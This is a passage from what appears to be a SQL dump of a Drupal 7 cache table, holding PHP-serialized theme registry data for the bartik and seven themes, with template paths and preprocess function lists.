functions\";a:4:{i:0;s:19:\"template_preprocess\";i:1;s:27:\"template_preprocess_comment\";i:2;s:21:\"contextual_preprocess\";i:3;s:22:\"rdf_preprocess_comment\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:22:\"comment_post_forbidden\";a:6:{s:9:\"variables\";a:1:{s:4:\"node\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:15:\"modules/comment\";s:8:\"function\";s:28:\"theme_comment_post_forbidden\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:15:\"comment_wrapper\";a:6:{s:8:\"template\";s:31:\"modules/comment/comment-wrapper\";s:14:\"render element\";s:7:\"content\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:15:\"modules/comment\";s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:35:\"template_preprocess_comment_wrapper\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:17:\"color_scheme_form\";a:6:{s:14:\"render element\";s:4:\"form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/color\";s:8:\"function\";s:23:\"theme_color_scheme_form\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:5:\"block\";a:6:{s:14:\"render element\";s:8:\"elements\";s:8:\"template\";s:19:\"modules/block/block\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/block\";s:20:\"preprocess functions\";a:4:{i:0;s:19:\"template_preprocess\";i:1;s:25:\"template_preprocess_block\";i:2;s:21:\"contextual_preprocess\";i:3;s:23:\"system_preprocess_block\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:24:\"block_admin_display_form\";a:8:{s:8:\"template\";s:38:\"modules/block/block-admin-display-form\";s:4:\"file\";s:15:\"block.admin.inc\";s:14:\"render element\";s:4:\"form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/block\";s:8:\"includes\";a:1:{i:0;s:29:\"modules/block/block.admin.inc\";}s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:44:\"template_preprocess_block_admin_display_form\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}}',0,1423658754,1),('theme_registry:runtime:bartik','a:153:{s:9:\"menu_tree\";a:5:{s:8:\"function\";s:16:\"bartik_menu_tree\";s:4:\"type\";s:12:\"theme_engine\";s:10:\"theme path\";s:13:\"themes/bartik\";s:14:\"render element\";s:4:\"tree\";s:20:\"preprocess functions\";a:1:{i:0;s:29:\"template_preprocess_menu_tree\";}}s:30:\"field__taxonomy_term_reference\";N;s:4:\"page\";a:7:{s:8:\"template\";s:4:\"page\";s:4:\"path\";s:23:\"themes/bartik/templates\";s:4:\"type\";s:12:\"theme_engine\";s:10:\"theme path\";s:13:\"themes/bartik\";s:14:\"render element\";s:4:\"page\";s:20:\"preprocess functions\";a:5:{i:0;s:19:\"template_preprocess\";i:1;s:24:\"template_preprocess_page\";i:2;s:21:\"contextual_preprocess\";i:3;s:23:\"overlay_preprocess_page\";i:4;s:24:\"shortcut_preprocess_page\";}s:17:\"process functions\";a:4:{i:0;s:16:\"template_process\";i:1;s:21:\"template_process_page\";i:2;s:11:\"rdf_process\";i:3;s:19:\"bartik_process_page\";}}s:15:\"comment_wrapper\";a:7:{s:8:\"template\";s:15:\"comment-wrapper\";s:4:\"path\";s:23:\"themes/bartik/templates\";s:4:\"type\";s:12:\"theme_engine\";s:10:\"theme path\";s:13:\"themes/bartik\";s:14:\"render element\";s:7:\"content\";s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:35:\"template_preprocess_comment_wrapper\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:16:\"maintenance_page\";N;s:7:\"comment\";N;s:4:\"node\";a:7:{s:8:\"template\";s:4:\"node\";s:4:\"path\";s:23:\"themes/bartik/templates\";s:4:\"type\";s:12:\"theme_engine\";s:10:\"theme path\";s:13:\"themes/bartik\";s:14:\"render element\";s:8:\"elements\";s:20:\"preprocess functions\";a:5:{i:0;s:19:\"template_preprocess\";i:1;s:24:\"template_preprocess_node\";i:2;s:21:\"contextual_preprocess\";i:3;s:19:\"rdf_preprocess_node\";i:4;s:22:\"bartik_preprocess_node\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:12:\"user_picture\";a:6:{s:9:\"variables\";a:1:{s:7:\"account\";N;}s:8:\"template\";s:25:\"modules/user/user-picture\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/user\";s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:32:\"template_preprocess_user_picture\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:12:\"user_profile\";a:8:{s:14:\"render element\";s:8:\"elements\";s:8:\"template\";s:25:\"modules/user/user-profile\";s:4:\"file\";s:14:\"user.pages.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/user\";s:8:\"includes\";a:1:{i:0;s:27:\"modules/user/user.pages.inc\";}s:20:\"preprocess functions\";a:4:{i:0;s:19:\"template_preprocess\";i:1;s:32:\"template_preprocess_user_profile\";i:2;s:21:\"contextual_preprocess\";i:3;s:27:\"rdf_preprocess_user_profile\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:21:\"user_profile_category\";a:8:{s:14:\"render element\";s:7:\"element\";s:8:\"template\";s:34:\"modules/user/user-profile-category\";s:4:\"file\";s:14:\"user.pages.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/user\";s:8:\"includes\";a:1:{i:0;s:27:\"modules/user/user.pages.inc\";}s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:41:\"template_preprocess_user_profile_category\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:17:\"user_profile_item\";a:8:{s:14:\"render element\";s:7:\"element\";s:8:\"template\";s:30:\"modules/user/user-profile-item\";s:4:\"file\";s:14:\"user.pages.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/user\";s:8:\"includes\";a:1:{i:0;s:27:\"modules/user/user.pages.inc\";}s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:37:\"template_preprocess_user_profile_item\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:9:\"user_list\";N;s:22:\"user_admin_permissions\";N;s:16:\"user_admin_roles\";N;s:27:\"user_permission_description\";N;s:14:\"user_signature\";N;s:26:\"update_manager_update_form\";N;s:17:\"update_last_check\";N;s:13:\"update_report\";N;s:14:\"update_version\";N;s:19:\"update_status_label\";N;s:7:\"toolbar\";a:7:{s:14:\"render element\";s:7:\"toolbar\";s:8:\"template\";s:7:\"toolbar\";s:4:\"path\";s:15:\"modules/toolbar\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:15:\"modules/toolbar\";s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:21:\"contextual_preprocess\";i:2;s:26:\"toolbar_preprocess_toolbar\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:14:\"toolbar_toggle\";a:4:{s:9:\"variables\";a:2:{s:9:\"collapsed\";N;s:10:\"attributes\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:15:\"modules/toolbar\";s:8:\"function\";s:20:\"theme_toolbar_toggle\";}s:30:\"taxonomy_overview_vocabularies\";N;s:23:\"taxonomy_overview_terms\";N;s:13:\"taxonomy_term\";N;s:4:\"html\";a:6:{s:14:\"render element\";s:4:\"page\";s:8:\"template\";s:19:\"modules/system/html\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"themes/bartik\";s:20:\"preprocess functions\";a:6:{i:0;s:19:\"template_preprocess\";i:1;s:24:\"template_preprocess_html\";i:2;s:21:\"contextual_preprocess\";i:3;s:23:\"overlay_preprocess_html\";i:4;s:23:\"toolbar_preprocess_html\";i:5;s:22:\"bartik_preprocess_html\";}s:17:\"process functions\";a:4:{i:0;s:16:\"template_process\";i:1;s:21:\"template_process_html\";i:2;s:11:\"rdf_process\";i:3;s:19:\"bartik_process_html\";}}s:6:\"region\";a:6:{s:14:\"render element\";s:8:\"elements\";s:8:\"template\";s:21:\"modules/system/region\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:26:\"template_preprocess_region\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:15:\"status_messages\";a:4:{s:9:\"variables\";a:1:{s:7:\"display\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:21:\"theme_status_messages\";}s:4:\"link\";a:4:{s:9:\"variables\";a:3:{s:4:\"text\";N;s:4:\"path\";N;s:7:\"options\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:10:\"theme_link\";}s:5:\"links\";a:4:{s:9:\"variables\";a:3:{s:5:\"links\";N;s:10:\"attributes\";a:1:{s:5:\"class\";a:1:{i:0;s:5:\"links\";}}s:7:\"heading\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:11:\"theme_links\";}s:5:\"image\";a:5:{s:9:\"variables\";a:6:{s:4:\"path\";N;s:5:\"width\";N;s:6:\"height\";N;s:3:\"alt\";s:0:\"\";s:5:\"title\";N;s:10:\"attributes\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:11:\"theme_image\";s:20:\"preprocess functions\";a:1:{i:0;s:20:\"rdf_preprocess_image\";}}s:10:\"breadcrumb\";a:4:{s:9:\"variables\";a:1:{s:10:\"breadcrumb\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:16:\"theme_breadcrumb\";}s:4:\"help\";N;s:5:\"table\";a:4:{s:9:\"variables\";a:7:{s:6:\"header\";N;s:4:\"rows\";N;s:10:\"attributes\";a:0:{}s:7:\"caption\";N;s:9:\"colgroups\";a:0:{}s:6:\"sticky\";b:1;s:5:\"empty\";s:0:\"\";}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:11:\"theme_table\";}s:19:\"tablesort_indicator\";a:4:{s:9:\"variables\";a:1:{s:5:\"style\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:25:\"theme_tablesort_indicator\";}s:4:\"mark\";N;s:9:\"item_list\";a:4:{s:9:\"variables\";a:4:{s:5:\"items\";a:0:{}s:5:\"title\";N;s:4:\"type\";s:2:\"ul\";s:10:\"attributes\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:15:\"theme_item_list\";}s:14:\"more_help_link\";N;s:9:\"feed_icon\";a:4:{s:9:\"variables\";a:2:{s:3:\"url\";N;s:5:\"title\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:15:\"theme_feed_icon\";}s:9:\"more_link\";N;s:8:\"username\";a:6:{s:9:\"variables\";a:1:{s:7:\"account\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:14:\"theme_username\";s:20:\"preprocess functions\";a:2:{i:0;s:28:\"template_preprocess_username\";i:1;s:23:\"rdf_preprocess_username\";}s:17:\"process functions\";a:1:{i:0;s:25:\"template_process_username\";}}s:12:\"progress_bar\";N;s:11:\"indentation\";N;s:8:\"html_tag\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:14:\"theme_html_tag\";}s:11:\"update_page\";N;s:12:\"install_page\";N;s:9:\"task_list\";N;s:17:\"authorize_message\";N;s:16:\"authorize_report\";N;s:5:\"pager\";a:4:{s:9:\"variables\";a:4:{s:4:\"tags\";a:0:{}s:7:\"element\";i:0;s:10:\"parameters\";a:0:{}s:8:\"quantity\";i:9;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:11:\"theme_pager\";}s:11:\"pager_first\";a:4:{s:9:\"variables\";a:3:{s:4:\"text\";N;s:7:\"element\";i:0;s:10:\"parameters\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:17:\"theme_pager_first\";}s:14:\"pager_previous\";a:4:{s:9:\"variables\";a:4:{s:4:\"text\";N;s:7:\"element\";i:0;s:8:\"interval\";i:1;s:10:\"parameters\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:20:\"theme_pager_previous\";}s:10:\"pager_next\";a:4:{s:9:\"variables\";a:4:{s:4:\"text\";N;s:7:\"element\";i:0;s:8:\"interval\";i:1;s:10:\"parameters\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:16:\"theme_pager_next\";}s:10:\"pager_last\";a:4:{s:9:\"variables\";a:3:{s:4:\"text\";N;s:7:\"element\";i:0;s:10:\"parameters\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:16:\"theme_pager_last\";}s:10:\"pager_link\";N;s:9:\"menu_link\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:15:\"theme_menu_link\";}s:15:\"menu_local_task\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:21:\"theme_menu_local_task\";}s:17:\"menu_local_action\";N;s:16:\"menu_local_tasks\";a:4:{s:9:\"variables\";a:2:{s:7:\"primary\";a:0:{}s:9:\"secondary\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:22:\"theme_menu_local_tasks\";}s:6:\"select\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:12:\"theme_select\";}s:8:\"fieldset\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:14:\"theme_fieldset\";}s:5:\"radio\";N;s:6:\"radios\";N;s:4:\"date\";N;s:15:\"exposed_filters\";N;s:8:\"checkbox\";N;s:10:\"checkboxes\";N;s:6:\"button\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:12:\"theme_button\";}s:12:\"image_button\";N;s:6:\"hidden\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:12:\"theme_hidden\";}s:9:\"textfield\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:15:\"theme_textfield\";}s:4:\"form\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:10:\"theme_form\";}s:8:\"textarea\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:14:\"theme_textarea\";}s:8:\"password\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:14:\"theme_password\";}s:4:\"file\";N;s:11:\"tableselect\";N;s:12:\"form_element\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:18:\"theme_form_element\";}s:20:\"form_required_marker\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:26:\"theme_form_required_marker\";}s:18:\"form_element_label\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:24:\"theme_form_element_label\";}s:13:\"vertical_tabs\";N;s:9:\"container\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:15:\"theme_container\";}s:18:\"system_themes_page\";N;s:20:\"system_settings_form\";N;s:12:\"confirm_form\";N;s:23:\"system_modules_fieldset\";N;s:27:\"system_modules_incompatible\";N;s:24:\"system_modules_uninstall\";N;s:13:\"status_report\";N;s:10:\"admin_page\";N;s:11:\"admin_block\";N;s:19:\"admin_block_content\";N;s:18:\"system_admin_index\";N;s:17:\"system_powered_by\";a:4:{s:9:\"variables\";a:0:{}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:23:\"theme_system_powered_by\";}s:19:\"system_compact_link\";N;s:25:\"system_date_time_settings\";N;s:22:\"shortcut_set_customize\";N;s:17:\"search_block_form\";a:6:{s:14:\"render element\";s:4:\"form\";s:8:\"template\";s:32:\"modules/search/search-block-form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/search\";s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:37:\"template_preprocess_search_block_form\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:13:\"search_result\";N;s:14:\"search_results\";N;s:29:\"rdf_template_variable_wrapper\";a:4:{s:9:\"variables\";a:4:{s:7:\"content\";N;s:10:\"attributes\";a:0:{}s:7:\"context\";a:0:{}s:6:\"inline\";b:1;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:11:\"modules/rdf\";s:8:\"function\";s:35:\"theme_rdf_template_variable_wrapper\";}s:12:\"rdf_metadata\";a:4:{s:9:\"variables\";a:1:{s:8:\"metadata\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:11:\"modules/rdf\";s:8:\"function\";s:18:\"theme_rdf_metadata\";}s:7:\"overlay\";N;s:23:\"overlay_disable_message\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:15:\"modules/overlay\";s:8:\"function\";s:29:\"theme_overlay_disable_message\";}s:12:\"options_none\";N;s:17:\"node_search_admin\";N;s:13:\"node_add_list\";N;s:12:\"node_preview\";N;s:19:\"node_admin_overview\";N;s:17:\"node_recent_block\";N;s:19:\"node_recent_content\";N;s:18:\"menu_overview_form\";N;s:19:\"menu_admin_overview\";N;s:11:\"image_style\";N;s:16:\"image_style_list\";N;s:19:\"image_style_effects\";N;s:19:\"image_style_preview\";N;s:12:\"image_anchor\";N;s:20:\"image_resize_summary\";N;s:19:\"image_scale_summary\";N;s:18:\"image_crop_summary\";N;s:20:\"image_rotate_summary\";N;s:12:\"image_widget\";N;s:15:\"image_formatter\";N;s:21:\"filter_admin_overview\";N;s:32:\"filter_admin_format_filter_order\";N;s:11:\"filter_tips\";a:6:{s:9:\"variables\";a:2:{s:4:\"tips\";N;s:4:\"long\";b:0;}s:4:\"file\";s:16:\"filter.pages.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/filter\";s:8:\"function\";s:17:\"theme_filter_tips\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/filter/filter.pages.inc\";}}s:19:\"text_format_wrapper\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/filter\";s:8:\"function\";s:25:\"theme_text_format_wrapper\";}s:21:\"filter_tips_more_info\";a:4:{s:9:\"variables\";a:0:{}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/filter\";s:8:\"function\";s:27:\"theme_filter_tips_more_info\";}s:17:\"filter_guidelines\";a:4:{s:9:\"variables\";a:1:{s:6:\"format\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/filter\";s:8:\"function\";s:23:\"theme_filter_guidelines\";}s:9:\"file_link\";N;s:9:\"file_icon\";N;s:17:\"file_managed_file\";N;s:11:\"file_widget\";N;s:20:\"file_widget_multiple\";N;s:20:\"file_formatter_table\";N;s:16:\"file_upload_help\";N;s:14:\"field_ui_table\";N;s:5:\"field\";a:6:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/field\";s:8:\"function\";s:11:\"theme_field\";s:20:\"preprocess functions\";a:2:{i:0;s:25:\"template_preprocess_field\";i:1;s:20:\"rdf_preprocess_field\";}s:17:\"process functions\";a:1:{i:0;s:22:\"template_process_field\";}}s:25:\"field_multiple_value_form\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/field\";s:8:\"function\";s:31:\"theme_field_multiple_value_form\";}s:13:\"dblog_message\";N;s:9:\"dashboard\";N;s:15:\"dashboard_admin\";N;s:16:\"dashboard_region\";N;s:25:\"dashboard_disabled_blocks\";N;s:24:\"dashboard_disabled_block\";N;s:28:\"dashboard_admin_display_form\";N;s:13:\"comment_block\";N;s:15:\"comment_preview\";N;s:22:\"comment_post_forbidden\";a:4:{s:9:\"variables\";a:1:{s:4:\"node\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:15:\"modules/comment\";s:8:\"function\";s:28:\"theme_comment_post_forbidden\";}s:17:\"color_scheme_form\";N;s:5:\"block\";a:6:{s:14:\"render element\";s:8:\"elements\";s:8:\"template\";s:19:\"modules/block/block\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"themes/bartik\";s:20:\"preprocess functions\";a:5:{i:0;s:19:\"template_preprocess\";i:1;s:25:\"template_preprocess_block\";i:2;s:21:\"contextual_preprocess\";i:3;s:23:\"system_preprocess_block\";i:4;s:23:\"bartik_preprocess_block\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:24:\"block_admin_display_form\";N;}',0,1423766148,1),('theme_registry:runtime:seven','a:152:{s:19:\"tablesort_indicator\";a:4:{s:8:\"function\";s:25:\"seven_tablesort_indicator\";s:4:\"type\";s:12:\"theme_engine\";s:10:\"theme path\";s:12:\"themes/seven\";s:9:\"variables\";a:1:{s:5:\"style\";N;}}s:19:\"admin_block_content\";a:5:{s:8:\"function\";s:25:\"seven_admin_block_content\";s:4:\"type\";s:12:\"theme_engine\";s:10:\"theme path\";s:12:\"themes/seven\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/system/system.admin.inc\";}s:9:\"variables\";a:1:{s:7:\"content\";N;}}s:13:\"node_add_list\";a:5:{s:8:\"function\";s:19:\"seven_node_add_list\";s:4:\"type\";s:12:\"theme_engine\";s:10:\"theme path\";s:12:\"themes/seven\";s:8:\"includes\";a:1:{i:0;s:27:\"modules/node/node.pages.inc\";}s:9:\"variables\";a:1:{s:7:\"content\";N;}}s:4:\"page\";a:7:{s:8:\"template\";s:4:\"page\";s:4:\"path\";s:12:\"themes/seven\";s:4:\"type\";s:12:\"theme_engine\";s:10:\"theme path\";s:12:\"themes/seven\";s:14:\"render element\";s:4:\"page\";s:20:\"preprocess functions\";a:6:{i:0;s:19:\"template_preprocess\";i:1;s:24:\"template_preprocess_page\";i:2;s:21:\"contextual_preprocess\";i:3;s:23:\"overlay_preprocess_page\";i:4;s:24:\"shortcut_preprocess_page\";i:5;s:21:\"seven_preprocess_page\";}s:17:\"process functions\";a:3:{i:0;s:16:\"template_process\";i:1;s:21:\"template_process_page\";i:2;s:11:\"rdf_process\";}}s:16:\"maintenance_page\";N;s:12:\"user_picture\";a:6:{s:9:\"variables\";a:1:{s:7:\"account\";N;}s:8:\"template\";s:25:\"modules/user/user-picture\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/user\";s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:32:\"template_preprocess_user_picture\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:12:\"user_profile\";N;s:21:\"user_profile_category\";N;s:17:\"user_profile_item\";N;s:9:\"user_list\";a:4:{s:9:\"variables\";a:2:{s:5:\"users\";N;s:5:\"title\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/user\";s:8:\"function\";s:15:\"theme_user_list\";}s:22:\"user_admin_permissions\";a:6:{s:14:\"render element\";s:4:\"form\";s:4:\"file\";s:14:\"user.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/user\";s:8:\"function\";s:28:\"theme_user_admin_permissions\";s:8:\"includes\";a:1:{i:0;s:27:\"modules/user/user.admin.inc\";}}s:16:\"user_admin_roles\";N;s:27:\"user_permission_description\";a:6:{s:9:\"variables\";a:2:{s:15:\"permission_item\";N;s:4:\"hide\";N;}s:4:\"file\";s:14:\"user.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/user\";s:8:\"function\";s:33:\"theme_user_permission_description\";s:8:\"includes\";a:1:{i:0;s:27:\"modules/user/user.admin.inc\";}}s:14:\"user_signature\";N;s:26:\"update_manager_update_form\";a:6:{s:14:\"render element\";s:4:\"form\";s:4:\"file\";s:18:\"update.manager.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/update\";s:8:\"function\";s:32:\"theme_update_manager_update_form\";s:8:\"includes\";a:1:{i:0;s:33:\"modules/update/update.manager.inc\";}}s:17:\"update_last_check\";a:4:{s:9:\"variables\";a:1:{s:4:\"last\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/update\";s:8:\"function\";s:23:\"theme_update_last_check\";}s:13:\"update_report\";N;s:14:\"update_version\";N;s:19:\"update_status_label\";N;s:7:\"toolbar\";N;s:14:\"toolbar_toggle\";N;s:30:\"taxonomy_overview_vocabularies\";N;s:23:\"taxonomy_overview_terms\";N;s:13:\"taxonomy_term\";N;s:4:\"html\";a:6:{s:14:\"render element\";s:4:\"page\";s:8:\"template\";s:19:\"modules/system/html\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"themes/seven\";s:20:\"preprocess functions\";a:6:{i:0;s:19:\"template_preprocess\";i:1;s:24:\"template_preprocess_html\";i:2;s:21:\"contextual_preprocess\";i:3;s:23:\"overlay_preprocess_html\";i:4;s:23:\"toolbar_preprocess_html\";i:5;s:21:\"seven_preprocess_html\";}s:17:\"process functions\";a:3:{i:0;s:16:\"template_process\";i:1;s:21:\"template_process_html\";i:2;s:11:\"rdf_process\";}}s:6:\"region\";a:6:{s:14:\"render element\";s:8:\"elements\";s:8:\"template\";s:21:\"modules/system/region\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:26:\"template_preprocess_region\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:15:\"status_messages\";a:4:{s:9:\"variables\";a:1:{s:7:\"display\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:21:\"theme_status_messages\";}s:4:\"link\";a:4:{s:9:\"variables\";a:3:{s:4:\"text\";N;s:4:\"path\";N;s:7:\"options\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:10:\"theme_link\";}s:5:\"links\";a:4:{s:9:\"variables\";a:3:{s:5:\"links\";N;s:10:\"attributes\";a:1:{s:5:\"class\";a:1:{i:0;s:5:\"links\";}}s:7:\"heading\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:11:\"theme_links\";}s:5:\"image\";a:5:{s:9:\"variables\";a:6:{s:4:\"path\";N;s:5:\"width\";N;s:6:\"height\";N;s:3:\"alt\";s:0:\"\";s:5:\"title\";N;s:10:\"attributes\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme 